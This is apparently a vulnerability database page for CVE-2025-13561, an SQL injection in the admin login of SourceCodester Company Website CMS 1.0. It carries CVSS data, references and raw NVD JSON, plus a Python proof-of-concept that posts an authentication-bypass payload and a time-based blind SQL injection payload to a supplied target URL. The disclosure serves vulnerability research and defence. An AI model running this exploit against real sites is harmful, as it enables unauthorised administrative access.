CVE-2025-13561

Description

A vulnerability was determined in SourceCodester Company Website CMS 1.0. This vulnerability affects unknown code of the file /admin/index.php. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:torrahclef:company_website_cms:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Company Website CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13561 SQL Injection PoC
# Target: SourceCodester Company Website CMS 1.0
# Endpoint: /admin/index.php
# Vulnerability: Username parameter SQL Injection

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/admin/index.php"

# Basic authentication bypass using SQL injection
payload_username = "admin' OR '1'='1' -- "
payload_password = "any_password"

data = {
    'Username': payload_username,
    'Password': payload_password
}

print(f"[*] Sending malicious request to {target_url}")
print(f"[*] Payload: {payload_username}")

try:
    response = requests.post(target_url, data=data, timeout=10, allow_redirects=False)
    
    # Check for successful login indicators
    if response.status_code in [200, 302]:
        if 'admin' in response.text.lower() or 'dashboard' in response.text.lower():
            print("[+] Potential authentication bypass detected!")
            print("[+] Admin access may have been achieved")
        else:
            print("[-] No obvious authentication bypass detected")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Time-based blind SQL injection test
def test_blind_sql_injection(url):
    # Test if SLEEP function is executed (indicating SQL injection)
    blind_payload = "admin' AND SLEEP(5) -- "
    data = {'Username': blind_payload, 'Password': 'test'}
    
    print("[*] Testing time-based blind SQL injection...")
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Blind SQL injection confirmed!")
            return True
    except requests.exceptions.Timeout:
        print("[+] Blind SQL injection confirmed (timeout occurred)!")
        return True
    return False

test_blind_sql_injection(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13561
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13561
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13561/
[4] VulDB https://vuldb.com/cve/CVE-2025-13561
[5] https://github.com/miwangdemaoxianzhe/CVE/issues/2
[6] https://vuldb.com/?ctiid.333326
[7] https://vuldb.com/?id.333326
[8] https://vuldb.com/?submit.696684
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13561", "sourceIdentifier": "[email protected]", "published": "2025-11-23T18:15:54.187", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in SourceCodester Company Website CMS 1.0. This vulnerability affects unknown code of the file /admin/index.php. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torrahclef:company_website_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7306C184-4E16-44A2-B860-8271D88E836F"}]}]}], "references": [{"url": "https://github.com/miwangdemaoxianzhe/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333326", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333326", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696684", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}